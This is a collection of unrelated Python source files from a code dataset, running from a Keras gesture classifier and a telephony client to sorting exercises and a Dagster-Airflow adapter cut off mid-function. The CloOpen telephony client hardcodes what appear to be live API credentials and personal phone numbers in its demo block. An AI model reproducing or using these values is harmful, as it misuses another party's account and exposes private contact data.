NOTE: this second fit() retrains the same model and overwrites H; keep whichever of the two training calls you need\nprint(\"[INFO] training network...\")\nH=model.fit(trainX, trainY,\n\tvalidation_data=(testX, testY), steps_per_epoch=len(trainX) // BS,\n\tepochs=EPOCHS, verbose=1, validation_steps=5)\n\n \n# save the model to disk\nprint(\"[INFO] serializing network...\")\n# 'gesture_model.h5' is an assumed filename; the original os.getcwd()[\"model\"] indexed a string, which raises TypeError\nmodel.save(os.path.join(os.getcwd(), 'gesture_model.h5'))\n\n\n\nplt.style.use(\"ggplot\")\nplt.figure()\nN = EPOCHS\nplt.plot(np.arange(0, N), H.history[\"loss\"], label=\"train_loss\")\nplt.plot(np.arange(0, N), H.history[\"val_loss\"], label=\"val_loss\")\nplt.plot(np.arange(0, N), H.history[\"acc\"], label=\"train_acc\")\nplt.plot(np.arange(0, N), H.history[\"val_acc\"], label=\"val_acc\")\nplt.title(\"Training Loss and Accuracy on Dataset\")\nplt.xlabel(\"Epoch #\")\nplt.ylabel(\"Loss/Accuracy\")\nplt.legend(loc=\"lower left\")\n\n \n# pre-process the image for classification\ndef classify_image(image):\n image = preprocess_image_v2(image, bg_img)\n orig = image.copy()\n \n image = cv2.resize(image, (28, 28))\n \n image = image.astype(\"float\") / 255.0\n image = img_to_array(image)\n image = np.expand_dims(image, axis=0)\n \n (two, five) = model.predict(image)[0]\n \n label = \"Five\" if five > two else \"Two\"\n proba = five if five > two else two\n label = \"{}: {:.2f}%\".format(label, proba * 100)\n \n # draw the label on the image\n output = imutils.resize(orig, width=400)\n cv2.putText(output, label, (10, 25), cv2.FONT_HERSHEY_SIMPLEX,\n \t0.7, (255, 255, 255), 2)\n \n # show the output image\n cv2.imshow(\"Output\", output)\n\nimage = cv2.imread('test202.jpg')\nclassify_image(image)\n\ncapture_image()\ncv2.destroyAllWindows()\n\n","sub_path":"keras_gestures.py","file_name":"keras_gestures.py","file_ext":"py","file_size_in_byte":6221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"335829527","text":"# vim: set fileencoding=utf-8 :\n\nimport hashlib\nimport base64\nimport datetime\nimport requests\nimport json\n\nclass CloOpen:\n\n api_host = ''\n app_id = ''\n headers = {\n 'Accept': 'application/json',\n 'Content-Type': 'application/json;charset=utf-8',\n }\n\n\n def __init__(self, debug=False):\n self.debug = debug\n if self.debug:\n server_ip = 'app.cloopen.com'\n else:\n server_ip = 'app.cloopen.com'\n server_port = '8883'\n server_version = '2013-12-26'\n self.api_host = 'https://{0}:{1}/{2}'.format(server_ip, server_port, server_version)\n\n\n def init_app_id(self, app_id):\n self.app_id = app_id;\n\n\n def init_account(self, account_sid, account_token):\n self.account_sid = account_sid;\n self.account_token = account_token;\n\n\n def init_sub_account(self, sub_account_sid, sub_account_token):\n 
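# cache the sub-account credentials; _auth_and_url() uses them to build both the sig parameter and the Authorization header\n 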
self.sub_account_sid = sub_account_sid;\n self.sub_account_token = sub_account_token;\n\n\n def log(self, url, request, response):\n print('Request URL:\\n{0}\\n'.format(url))\n print('Request Body:\\n{0}\\n'.format(request))\n print('Response Body:\\n{0}\\n'.format(response))\n print('********************************')\n\n\n def _auth_and_url(self):\n time_string = datetime.datetime.now().strftime('%Y%m%d%H%M%S')\n\n src = '{0}:{1}'.format(self.sub_account_sid, time_string)\n auth = base64.encodestring(src.encode('utf-8')).strip()\n\n signature = '{0}{1}{2}'.format(self.sub_account_sid, self.sub_account_token, time_string)\n signature = hashlib.md5(signature.encode('utf-8')).hexdigest().upper()\n url = '{host}/SubAccounts/{sid}/Calls/Callback?sig={signature}'.format(host=self.api_host, sid=self.sub_account_sid, signature=signature)\n\n return auth, url\n\n\n def action_call_back(self, caller, callee, caller_showing, callee_showing, user_data, max_call_time):\n\n body = {\n \"from\": caller,\n \"to\": callee,\n \"customerSerNum\": callee_showing,\n \"fromSerNum\": caller_showing,\n \"userData\": user_data,\n \"maxCallTime\": max_call_time,\n \"promptTone\": 'connecting2patient.wav',\n \"alwaysPlay\": 'true',\n \"countDownTime\": 60,\n \"countDownPrompt\": '1minute.wav',\n \"terminalDtmf\": None,\n \"hangupCdrUrl\": None,\n \"needBothCdr\": None,\n \"needRecord\": 1,\n \"recordPoint\": 0,\n }\n\n auth, url = self._auth_and_url()\n self.headers.update({'Authorization': auth})\n\n req = requests.post(url, data=json.dumps(body), headers=self.headers)\n\n data = req.text\n try:\n if self.debug:\n self.log(url, body, data)\n locations = json.loads(data)\n return locations\n except Exception as e:\n print(e)\n pass\n\n\nif __name__ == '__main__':\n\n app_id = '8a48b55151eb7d520151ec93ab110353'\n sub_account_sid = 'fcbd00aeadfb11e59288ac853d9f54f2'\n sub_account_token = '17369f19ec0ffff3a1d971f4fffa8e5f'\n\n # action_call_back(caller, callee, caller_showing, callee_showing, user_data, max_call_time):\n def demo(caller, callee, caller_showing, callee_showing, user_data, max_call_time):\n cloopen = CloOpen(debug=True)\n cloopen.init_app_id(app_id)\n cloopen.init_sub_account(sub_account_sid, sub_account_token)\n\n response = cloopen.action_call_back(caller, callee, caller_showing, callee_showing, user_data, max_call_time)\n status = response.get('statusCode')\n callback = response.get('CallBack')\n if status != '000000':\n print(response)\n for k, v in callback.items():\n print('%s: %s' % (k, v))\n\n\n # demo('18513852351', '13810261155', '4000686895', '4000686895')\n demo('13810261155', '18513852351', '4000686895', '4000686895', 'order-id-abc-123', 150)\n\n\n","sub_path":"project/backend-staging/src/contrib/libs/cloopen.py","file_name":"cloopen.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"35622822","text":"# Copyright 2018 WolkAbout Technology s.r.o.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the 
License.\n\n\"\"\"\nAlarm Module.\n\"\"\"\n\n\nclass Alarm:\n \"\"\"Alarm event that ocurred on device.\"\"\"\n\n def __init__(self, reference, active, timestamp=None):\n \"\"\"\n Information about alarm event.\n\n :param reference: Alarm reference\n :type reference: str\n :param active: Current state of the alarm\n :type active: bool\n :param timestamp: Unix timestamp. If not provided, platform will assign\n :type timestamp: int or None\n \"\"\"\n self.reference = reference\n self.active = active\n self.timestamp = timestamp\n","sub_path":"Alarm.py","file_name":"Alarm.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"292261781","text":"import random\n\n\nclass TreatmentFurnace:\n def __init__(self, env, allocator, num):\n self.env = env\n self.alloc = allocator\n\n self.name = 'treatment_furnace_' + str(num + 1)\n self.capacity = 300\n\n self.current_job_list = []\n print(self.name + ' :: created')\n\n def calc_treatment_time(self):\n print(self.name, ' :: calculate treatment time')\n return random.randint(30, 50)\n\n def run(self):\n while True:\n new_job_list = self.alloc.get_next_treatment_job(self.name, self.capacity)\n if new_job_list == None:\n yield self.env.timeout(10)\n continue\n # new_job['properties']['last_process'] = 'treatment_waiting'\n self.current_job_list.extend(new_job_list)\n print('debug :', self.name, self.current_job_list)\n\n print(self.env.now, self.name, ':: treatment start', self.current_job_list)\n treatment_time = self.calc_treatment_time()\n for j in self.current_job_list:\n # j['properties']['current_equip'] = self.name\n # j['properties']['last_process'] = 'treatment'\n j['properties']['last_process_end_time'] = self.env.now + treatment_time\n yield self.env.timeout(treatment_time)\n for j in self.current_job_list:\n self.alloc.end_job(j)\n # j['properties']['next_instruction'] += 1\n # if len(j['properties']['instruction_list'][0]) == j['properties']['next_instruction']:\n # j['properties']['state'] = 'done'\n # #j['properties']['instruction_log'].append(self.name)\n print(self.env.now, self.name, ':: treatment end', self.current_job_list)\n\n self.current_job_list = []\n","sub_path":"Equipment/TreatmentFurnace.py","file_name":"TreatmentFurnace.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"259255071","text":"#!/bin/python3\r\nimport urllib.parse\r\nimport unittest\r\nimport urllib.request as req\r\n\r\n\r\nclass UrllibTest(unittest.TestCase):\r\n\r\n\t@staticmethod\r\n\tdef test1():\r\n\t\tprint(urllib.parse.quote(\"(\")) # %28\r\n\t\tprint(urllib.parse.quote(\"\\\\\")) # %5C\r\n\r\n\t@staticmethod\r\n\tdef test2():\r\n\t\tprint(urllib.parse.unquote(\"%2F\")) # /\r\n\r\n\t@staticmethod\r\n\tdef test3():\r\n\t\tresp = req.urlopen(\"http://www.baidu.com\")\r\n\t\tres = resp.read()\r\n\t\tprint(type(res)) # \r\n\t\tres_str = str(res, encoding=\"utf-8\")\r\n\t\tprint(type(res_str)) # \r\n\t\tres_str2 = res.decode(encoding=\"utf-8\")\r\n\t\tprint(type(res_str2)) # \r\n\t\tprint(res_str2)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tsuite = 
unittest.TestSuite()\r\n\tsuite.addTest(UrllibTest('test1'))\r\n\tsuite.addTest(UrllibTest(\"test2\"))\r\n\r\n\tunittest.TextTestRunner(verbosity=2).run(suite)\r\n","sub_path":"urldemo/urllibdemo.py","file_name":"urllibdemo.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"360255891","text":"\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: Terry n\n\"\"\"\n# Imports\nimport numpy as np\nimport os\nimport sys\nimport tensorflow as tf\nimport cv2\n\n\n\n# if tf.__version__ < '1.4.0':\n# raise ImportError('Please upgrade your tensorflow installation to v1.4.* or later!')\n\nos.chdir('C:\\\\Users\\\\YFZX\\\\Desktop\\\\tensorflow_jupyter\\models-master\\\\research\\\\object_detection')\n\n\n# Env setup\n# This is needed to display the images.\n# %matplotlib inline\n\n# This is needed since the notebook is stored in the object_detection folder.\nsys.path.append(\"..\")\n\n# Object detection imports\nfrom utils import label_map_util\n\nfrom utils import visualization_utils as vis_util\n\n# Model preparation\n# What model to download.\n#MODEL_NAME = 'ssd_mobilenet_v1_coco_2017_11_17' # [30,21] best\n# MODEL_NAME = 'ssd_inception_v2_coco_2017_11_17' #[42,24]\n# MODEL_NAME = 'faster_rcnn_inception_v2_coco_2017_11_08' #[58,28]\n# MODEL_NAME = 'faster_rcnn_resnet50_coco_2017_11_08' #[89,30]\n# MODEL_NAME = 'faster_rcnn_resnet50_lowproposals_coco_2017_11_08' #[64, ]\n# MODEL_NAME = 'rfcn_resnet101_coco_2017_11_08' #[106,32]\n# MODEL_NAME = 'faster_rcnn_inception_resnet_v2_atrous_coco_2018_01_28'\n# MODEL_NAME = 'ssdlite_mobilenet_v2_coco_2018_05_09'\nMODEL_NAME = 'linux_frozen_inference_graph'\n\n\n# Path to frozen detection graph. This is the actual model that is used for the object detection.\nPATH_TO_CKPT = MODEL_NAME + '/online_frozen_inference_graph.pb'\n\n# List of the strings that is used to add correct label for each box.\n#PATH_TO_LABELS = os.path.join('data', 'mscoco_label_map.pbtxt')\nPATH_TO_LABELS = os.path.join('data', 'linux_face.pbtxt')\n\n#NUM_CLASSES = 90\nNUM_CLASSES = 1\n# Load a (frozen) Tensorflow model into memory.\ndetection_graph = tf.Graph()\nwith detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n # Loading label map\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\ncategories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES,\n use_display_name=True)\ncategory_index = label_map_util.create_category_index(categories)\n\n\n# Helper code\ndef load_image_into_numpy_array(image):\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\n\n\n# Size, in inches, of the output images.\n# IMAGE_SIZE = (12, 8)\n\n\nwith detection_graph.as_default():\n with tf.Session(graph=detection_graph) as sess:\n # Definite input and output Tensors for detection_graph\n image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n # Each box represents a part of the image where a particular object was detected.\n detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n # Each score represent how level of confidence for each of the objects.\n # Score is shown on the result image, together with the class label.\n detection_scores = 
detection_graph.get_tensor_by_name('detection_scores:0')\n detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\n num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n\n # the video to be detected, eg, \"test.mp4\" here\n vidcap = cv2.VideoCapture(0)\n # Default resolutions of the frame are obtained.The default resolutions are system dependent.\n # We convert the resolutions from float to integer.\n frame_width = int(vidcap.get(3))\n frame_height = int(vidcap.get(4))\n\n\n\n while (True):\n ret, image = vidcap.read()\n\n if ret == True:\n\n # image_np = load_image_into_numpy_array(image)\n image_np = image\n\n # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\n image_np_expanded = np.expand_dims(image_np, axis=0)\n # Actual detection.\n (boxes, scores, classes, num) = sess.run(\n [detection_boxes, detection_scores, detection_classes, num_detections],\n feed_dict={image_tensor: image_np_expanded})\n # Visualization of the results of a detection.\n vis_util.visualize_boxes_and_labels_on_image_array(\n image_np,\n np.squeeze(boxes),\n np.squeeze(classes).astype(np.int32),\n np.squeeze(scores),\n category_index,\n use_normalized_coordinates=True,\n line_thickness=8)\n print(scores)\n cv2.imshow(\"capture\",image_np)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n ret = False\n # Break the loop\n else:\n break\nvidcap.release()\n\n","sub_path":"double_eyes/laptop_former_camera.py","file_name":"laptop_former_camera.py","file_ext":"py","file_size_in_byte":5040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"613623858","text":"import os\nimport sqlite3\nfrom functools import update_wrapper\n\nfrom dagster import check\n\nfrom .sql import run_migrations_offline as run_migrations_offline_\nfrom .sql import run_migrations_online as run_migrations_online_\n\n\ndef run_migrations_offline(*args, **kwargs):\n try:\n run_migrations_offline_(*args, **kwargs)\n except sqlite3.DatabaseError as exc:\n # This is to deal with concurrent execution -- if this table already exists thanks to a\n # race with another process, we are fine and can continue.\n if not 'table alembic_version already exists' in str(exc):\n raise\n\n\ndef run_migrations_online(*args, **kwargs):\n try:\n run_migrations_online_(*args, **kwargs)\n except (sqlite3.DatabaseError, sqlite3.OperationalError) as exc:\n # This is to deal with concurrent execution -- if this table already exists thanks to a\n # race with another process, we are fine and can continue.\n if not 'table alembic_version already exists' in str(exc):\n raise\n\n\nupdate_wrapper(run_migrations_offline, run_migrations_offline_)\n\nupdate_wrapper(run_migrations_online, run_migrations_online_)\n\n\ndef create_db_conn_string(base_dir, db_name):\n check.str_param(base_dir, 'base_dir')\n check.str_param(db_name, 'db_name')\n\n path_components = os.path.abspath(base_dir).split(os.sep)\n db_file = '{}.db'.format(db_name)\n return 'sqlite:///{}'.format('/'.join(path_components + [db_file]))\n","sub_path":"python_modules/dagster/dagster/core/storage/sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"181654352","text":"import subprocess\nimport os\n\ndescription = \"\"\"\nInstalls the latest jQuery version into the static folders at:\n/scripts/libs/jquery/jquery.js\n/scripts/libs/jquery/jquery.min.js\n\nFor more information, 
visit:\nhttp://jquery.org/\n\"\"\"\n\ndef post_build():\n\n jquery_dir = os.path.join(project_dir, 'static/scripts/libs/jquery')\n if not os.path.exists(jquery_dir):\n os.makedirs(jquery_dir)\n commands = [\n 'cd '+jquery_dir,\n 'touch jquery.js',\n 'touch jquery.min.js',\n 'curl http://code.jquery.com/jquery-latest.js > jquery.js',\n 'curl http://code.jquery.com/jquery-latest.min.js > jquery.min.js',\n ]\n kwargs = dict(\n shell=True\n )\n process = subprocess.Popen('; '.join(commands), **kwargs)\n stdout, stderr = process.communicate()","sub_path":"modules/jquery/chuck_module.py","file_name":"chuck_module.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"536096229","text":"\"\"\" This is an implementation of the naive approach for sorting the elements\n of a list. This approach is called Bubble Sort or, sometimes, Sinking Sort.\n The name bubble sort comes from the fact that at each iteration the largest\n or smallest remaining element ends up at the position where it belongs.\n The time complexity is O(n^2).\n\"\"\"\n\ndef bubble_sort(list):\n n = len(list)\n for i in range(0, n - 1):\n for j in range(0, n - 1- i):\n if (list[j] > list[j+1]):\n # swap positions\n list[j], list[j+1] = list[j+1], list[j]\n return list\n\nages = [21, 4, 1, 3, 9, 20, 25, 6, 21, 14]\n\nprint(bubble_sort(ages))","sub_path":"data_structures_and_algorithms/bubble_sort.py","file_name":"bubble_sort.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"345901381","text":"\n\nfrom xai.brain.wordbase.verbs._spot import _SPOT\n\n#class header\nclass _SPOTS(_SPOT, ):\n\tdef __init__(self,): \n\t\t_SPOT.__init__(self)\n\t\tself.name = \"SPOTS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"spot\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_spots.py","file_name":"_spots.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"569664428","text":"# Given an array of integers nums and a target value, find the two integers in the array that sum to the target and return their indices. \n# \n# You may assume each input has exactly one answer, and the same element may not be used twice. \n# \n# \n# \n# Example: \n# \n# Given nums = [2, 7, 11, 15], target = 9\n# \n# Because nums[0] + nums[1] = 2 + 7 = 9\n# the answer is [0, 1]\n# \n# Related Topics: array, hash table \n# 👍 9920 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nfrom typing import List\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n \"\"\"\n\n :rtype: object\n \"\"\"\n hashtable = {}\n for i, num in enumerate(nums):\n if target - num not in hashtable:\n hashtable[num] = i\n continue\n return [hashtable[target - num], i]\n return []\n\n\nex = Solution()\nprint(ex.twoSum([2, 7, 11, 15], 13))\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"[1]两数之和.py","file_name":"[1]两数之和.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"13386519","text":"class InsertionSort:\n\n def __init__(self,A):\n self.A=A;\n self.key=1300\n\n\n def displayArray(self):\n print(self.A)\n\n def sort(self):\n\n for j in range (1, len(self.A)):\n self.key=self.A[j]\n i=j-1\n\n # check i >= 0 before indexing; the original 'i > 0' never shifted A[0], misplacing keys smaller than the first element\n while i>=0 and self.A[i]>self.key:\n self.A[i+1]=self.A[i]\n i=i-1\n\n 
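# the scan stopped at the first element not greater than key, so slot i+1 is key's sorted position\n 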
self.A[i+1]=self.key\n\n\n\nA=[0,2,4,6,8,7,7,5,9,11]\n\nsort1=InsertionSort(A);\nsort1.sort()\nsort1.displayArray()\n","sub_path":"insertionSort.py","file_name":"insertionSort.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"370936547","text":"N, M = map(int, input().split(' '))\nrst_ls = [ '' for i in range(N) ]\nrst = ''\nif M == 0:\n if N == 1:\n print(0)\n else:\n rst = '1' + '0' * (N - 1)\n print(rst)\nelse:\n is_end = False\n for i in range(M):\n ls = list(input().split(' '))\n idx = int(ls[0]) - 1\n if idx == 0 and ls[1] == '0' and N > 1:\n is_end = True\n print(-1)\n break\n elif rst_ls[idx] == '':\n rst_ls[idx] = ls[1]\n elif rst_ls[idx] != ls[1]:\n is_end = True\n print(-1)\n break\n if not is_end:\n if rst_ls[0] == '' and N > 1:\n rst_ls[0] = 1\n for i in rst_ls:\n if i == '':\n i = 0\n print(i, end='')","sub_path":"Python_codes/p02761/s192557707.py","file_name":"s192557707.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"537071343","text":"import datetime\nimport logging\nimport sys\nfrom contextlib import contextmanager\n\nimport dateutil\nfrom airflow.models import TaskInstance\nfrom airflow.models.baseoperator import BaseOperator\nfrom airflow.models.dag import DAG\nfrom airflow.models.dagbag import DagBag\nfrom airflow.settings import LOG_FORMAT\n\nfrom dagster import (\n DagsterInvariantViolationError,\n DependencyDefinition,\n InputDefinition,\n MultiDependencyDefinition,\n Nothing,\n OutputDefinition,\n PipelineDefinition,\n RepositoryDefinition,\n SolidDefinition,\n check,\n solid,\n)\nfrom dagster.core.definitions.utils import VALID_NAME_REGEX, validate_tags\nfrom dagster.core.instance import AIRFLOW_EXECUTION_DATE_STR, IS_AIRFLOW_INGEST_PIPELINE_STR\n\n\nclass DagsterAirflowError(Exception):\n pass\n\n\ndef make_dagster_repo_from_airflow_dag_bag(dag_bag, repo_name):\n ''' Construct a Dagster repository corresponding to Airflow DAGs in DagBag.\n\n DagBag.get_dag() dependency requires Airflow DB to be initialized\n\n Usage:\n Create `make_dagster_repo.py`:\n from dagster_airflow.dagster_pipeline_factory import make_dagster_repo_from_airflow_dag_bag\n from airflow_home import my_dag_bag\n\n def make_repo_from_dag_bag():\n return make_dagster_repo_from_airflow_dag_bag(my_dag_bag, 'my_repo_name')\n\n Use RepositoryDefinition as usual, for example:\n `dagit -f path/to/make_dagster_repo.py -n make_repo_from_dag_bag`\n\n Args:\n dag_path (str): Path to directory or file that contains Airflow Dags\n repo_name (str): Name for generated RepositoryDefinition\n\n Returns:\n RepositoryDefinition\n '''\n check.inst_param(dag_bag, 'dag_bag', DagBag)\n check.str_param(repo_name, 'repo_name')\n\n pipeline_defs = []\n for dag_id in dag_bag.dag_ids:\n pipeline_defs.append(make_dagster_pipeline_from_airflow_dag(dag_bag.get_dag(dag_id)))\n\n return RepositoryDefinition(name=repo_name, pipeline_defs=pipeline_defs)\n\n\ndef make_dagster_repo_from_airflow_dags_path(\n dag_path, repo_name, safe_mode=True, store_serialized_dags=False\n):\n ''' Construct a Dagster repository corresponding to Airflow DAGs in dag_path.\n\n DagBag.get_dag() dependency requires Airflow DB to be initialized.\n\n Usage:\n\n Create `make_dagster_repo.py`:\n from dagster_airflow.dagster_pipeline_factory import make_dagster_repo_from_airflow_dags_path\n\n def make_repo_from_dir():\n return 
make_dagster_repo_from_airflow_dags_path(\n '/path/to/dags/', 'my_repo_name'\n )\n Use RepositoryDefinition as usual, for example:\n `dagit -f path/to/make_dagster_repo.py -n make_repo_from_dir`\n\n Args:\n dag_path (str): Path to directory or file that contains Airflow Dags\n repo_name (str): Name for generated RepositoryDefinition\n safe_mode (bool): True to use Airflow's default heuristic to find files that contain DAGs\n (ie find files that contain both b'DAG' and b'airflow') (default: True)\n store_serialized_dags (bool): True to read Airflow DAGS from Airflow DB. False to read DAGS\n from Python files. (default: False)\n\n Returns:\n RepositoryDefinition\n '''\n check.str_param(dag_path, 'dag_path')\n check.str_param(repo_name, 'repo_name')\n check.bool_param(safe_mode, 'safe_mode')\n check.bool_param(store_serialized_dags, 'store_serialized_dags')\n\n try:\n dag_bag = DagBag(\n dag_folder=dag_path,\n include_examples=False, # Exclude Airflow example DAGs\n safe_mode=safe_mode,\n store_serialized_dags=store_serialized_dags,\n )\n except Exception: # pylint: disable=broad-except\n raise DagsterAirflowError('Error initializing airflow.models.dagbag object with arguments')\n\n return make_dagster_repo_from_airflow_dag_bag(dag_bag, repo_name)\n\n\ndef make_dagster_pipeline_from_airflow_dag(dag, tags=None):\n '''Construct a Dagster pipeline corresponding to a given Airflow DAG.\n\n Tasks in the resulting pipeline will execute the execute() method on the corresponding Airflow\n Operator. Dagster, any dependencies required by Airflow Operators, and the module\n containing your DAG definition must be available in the Python environment within which\n your Dagster solids execute.\n\n To set Airflow's `execution_date` for use with Airflow Operator's execute() methods, either\n (1) (Best for ad hoc runs) Run Pipeline with 'default' preset, which sets execution_date to\n the time (in UTC) of pipeline invocation\n\n ```\n execute_pipeline(\n pipeline=make_dagster_pipeline_from_airflow_dag(dag),\n preset='default')\n ```\n\n (2) Add {'airflow_execution_date': utc_date_string} to the PipelineDefinition tags. This\n will override behavior from (1).\n\n ```\n execute_pipeline(\n make_dagster_pipeline_from_airflow_dag(\n dag,\n {'airflow_execution_date': utc_execution_date_str}\n )\n )\n ```\n\n (3) (Recommended) Add {'airflow_execution_date': utc_date_string} to the PipelineRun tags,\n such as in the Dagit UI. This will override behavior from (1) and (2)\n\n We apply normalized_name() to the dag id and task ids when generating pipeline name and solid\n names to ensure that names conform to Dagster's naming conventions.\n\n Args:\n dag (DAG): The Airflow DAG to compile into a Dagster pipeline\n tags (Dict[str, Field]): Pipeline tags. 
Optionally include\n `tags={'airflow_execution_date': utc_date_string}` to specify execution_date used within\n execution of Airflow Operators.\n\n Returns:\n pipeline_def (PipelineDefinition): The generated Dagster pipeline\n\n '''\n check.inst_param(dag, 'dag', DAG)\n tags = check.opt_dict_param(tags, 'tags')\n\n if IS_AIRFLOW_INGEST_PIPELINE_STR not in tags:\n tags[IS_AIRFLOW_INGEST_PIPELINE_STR] = 'true'\n\n tags = validate_tags(tags)\n\n pipeline_dependencies, solid_defs = _get_pipeline_definition_args(dag)\n pipeline_def = PipelineDefinition(\n name=normalized_name(dag.dag_id),\n solid_defs=solid_defs,\n dependencies=pipeline_dependencies,\n tags=tags,\n )\n return pipeline_def\n\n\n# Airflow DAG ids and Task ids allow a larger valid character set (alphanumeric characters,\n# dashes, dots and underscores) than Dagster's naming conventions (alphanumeric characters,\n# underscores), so Dagster will strip invalid characters and replace with '_'\ndef normalized_name(name):\n return 'airflow_' + ''.join(c if VALID_NAME_REGEX.match(c) else '_' for c in name)\n\n\ndef _get_pipeline_definition_args(dag):\n check.inst_param(dag, 'dag', DAG)\n pipeline_dependencies = {}\n solid_defs = []\n seen_tasks = []\n\n # To enforce predictable iteration order\n dag_roots = sorted(dag.roots, key=lambda x: x.task_id)\n for task in dag_roots:\n _traverse_airflow_dag(task, seen_tasks, pipeline_dependencies, solid_defs)\n return (pipeline_dependencies, solid_defs)\n\n\ndef _traverse_airflow_dag(task, seen_tasks, pipeline_dependencies, solid_defs):\n check.inst_param(task, 'task', BaseOperator)\n check.list_param(seen_tasks, 'seen_tasks', BaseOperator)\n check.list_param(solid_defs, 'solid_defs', SolidDefinition)\n\n seen_tasks.append(task)\n current_solid = make_dagster_solid_from_airflow_task(task)\n solid_defs.append(current_solid)\n\n if len(task.upstream_list) > 0:\n # To enforce predictable iteration order\n task_upstream_list = sorted(task.upstream_list, key=lambda x: x.task_id)\n\n pipeline_dependencies[current_solid.name] = {\n 'airflow_task_ready': MultiDependencyDefinition(\n [\n DependencyDefinition(\n solid=normalized_name(task_upstream.task_id),\n output='airflow_task_complete',\n )\n for task_upstream in task_upstream_list\n ]\n )\n }\n\n # To enforce predictable iteration order\n task_downstream_list = sorted(task.downstream_list, key=lambda x: x.task_id)\n for child_task in task_downstream_list:\n if child_task not in seen_tasks:\n _traverse_airflow_dag(child_task, seen_tasks, pipeline_dependencies, solid_defs)\n\n\n@contextmanager\ndef replace_airflow_logger_handlers():\n try:\n # Redirect airflow handlers to stdout / compute logs\n prev_airflow_handlers = logging.getLogger('airflow.task').handlers\n handler = logging.StreamHandler(sys.stdout)\n handler.setFormatter(logging.Formatter(LOG_FORMAT))\n root = logging.getLogger('airflow.task')\n root.handlers = [handler]\n yield\n finally:\n # Restore previous log handlers\n logging.getLogger('airflow.task').handlers = prev_airflow_handlers\n\n\ndef make_dagster_solid_from_airflow_task(task):\n check.inst_param(task, 'task', BaseOperator)\n\n @solid(\n name=normalized_name(task.task_id),\n input_defs=[InputDefinition('airflow_task_ready', Nothing)],\n output_defs=[OutputDefinition(Nothing, 'airflow_task_complete')],\n )\n def _solid(context): # pylint: disable=unused-argument\n if AIRFLOW_EXECUTION_DATE_STR not in context.pipeline_run.tags:\n raise DagsterInvariantViolationError(\n 'Could not find \"{AIRFLOW_EXECUTION_DATE_STR}\" in pipeline tags 
\"{tags}\". Please '\n 'add \"{AIRFLOW_EXECUTION_DATE_STR}\" to pipeline tags before executing'.format(\n AIRFLOW_EXECUTION_DATE_STR=AIRFLOW_EXECUTION_DATE_STR,\n tags=context.pipeline_run.tags,\n )\n )\n execution_date_str = context.pipeline_run.tags.get(AIRFLOW_EXECUTION_DATE_STR)\n\n check.str_param(execution_date_str, 'execution_date_str')\n try:\n execution_date = dateutil.parser.parse(execution_date_str)\n except ValueError:\n raise DagsterInvariantViolationError(\n 'Could not parse execution_date \"{execution_date_str}\". Please use datetime format '\n 'compatible with dateutil.parser.parse.'.format(\n execution_date_str=execution_date_str,\n )\n )\n except OverflowError:\n raise DagsterInvariantViolationError(\n 'Date \"{execution_date_str}\" exceeds the largest valid C integer on the system.'.format(\n execution_date_str=execution_date_str,\n )\n )\n\n check.inst_param(execution_date, 'execution_date', datetime.datetime)\n\n with replace_airflow_logger_handlers():\n task_instance = TaskInstance(task=task, execution_date=execution_date)\n\n ti_context = task_instance.get_template_context()\n task.render_template_fields(ti_context)\n\n 